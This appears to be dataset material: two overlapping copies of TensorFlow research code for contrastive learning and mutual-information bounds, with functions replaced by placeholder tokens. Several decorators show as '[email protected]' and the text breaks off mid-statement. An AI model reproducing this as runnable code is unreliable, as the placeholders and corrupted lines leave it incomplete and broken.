ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step 